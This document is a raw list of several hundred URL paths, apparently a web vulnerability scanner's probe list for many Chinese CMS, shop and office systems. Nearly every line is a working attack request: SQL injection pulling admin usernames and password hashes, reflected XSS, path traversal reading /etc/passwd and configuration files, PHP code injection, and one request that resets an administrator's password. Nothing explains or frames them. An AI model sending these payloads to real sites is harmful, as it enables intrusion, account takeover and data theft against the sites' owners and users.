/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
